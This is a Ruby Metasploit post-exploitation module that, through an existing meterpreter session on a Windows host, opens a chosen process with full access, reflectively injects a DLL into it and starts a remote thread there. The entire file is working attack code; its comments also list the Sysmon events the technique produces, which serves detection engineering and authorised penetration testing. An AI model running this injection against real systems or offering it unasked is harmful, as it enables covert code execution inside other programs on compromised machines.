reflective_dll_injection.rb
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
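# Metasploit post module for an existing Windows meterpreter session: it loads
# a DLL into a process chosen by PID through the ReflectiveDLLInjection mixin
# and starts a thread at the address the mixin returns.
#
# Observable behaviour, for detection engineering: the module opens a
# cross-process handle with PROCESS_ALL_ACCESS and then creates a thread in
# that process. On hosts running Sysmon these are typically reported as
# ProcessAccess (event ID 10) and CreateRemoteThread (event ID 8).
class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::Error
  include Msf::Post::Windows::ReflectiveDLLInjection

  # Registers the module metadata and its two required options.
  #
  # @param info [Hash] module info merged into the defaults via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => "Injects DLL into running process",
      'Description' => %q(
Performs DLL injection over current running process on windows.
),
      'Platform' => ['win'],
      'SessionTypes' => ['meterpreter'],
      'Author' => ['Chaitanya Haritash']
    ))
    register_options(
      [
        #OptString.new('SESSION', [true, 'Session ID' ]),
        OptString.new('DLL', [true, 'DLL path to be injected']),
        # PID is an integer option, so the help text names a process ID
        # rather than a process name.
        OptInt.new('PID', [true, 'PID of the process the DLL is injected into'])
      ], self.class)
  end

  # Validates the options, then opens the target process and hands it to the
  # mixin's inject_dll_into_process.
  #
  # Both options are checked before any handle is requested, so a missing
  # value never results in a PROCESS_ALL_ACCESS open on the target host.
  #
  # @return [nil] when an option is missing; otherwise the result of the
  #   final status print
  def run
    dll_path = datastore['DLL']
    pid = datastore['PID']

    if dll_path.blank?
      print_error("DLL path not Defined")
      return nil
    end

    if pid.blank?
      print_error("Process Not Define")
      return nil
    end

    session = client
    sysinfo = session.sys.config.sysinfo
    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)

    print_status("Running Module on session #{sysinfo['Computer']}")
    # The mixin returns two values; their sum is used as the thread start
    # address. NOTE(review): what the mixin writes into the target is not
    # visible in this file; confirm against the mixin source.
    dll_mem, offset = inject_dll_into_process(process, dll_path)
    process.thread.create(dll_mem + offset, 0)
    print_success("DLL injected Successfully")
  end
end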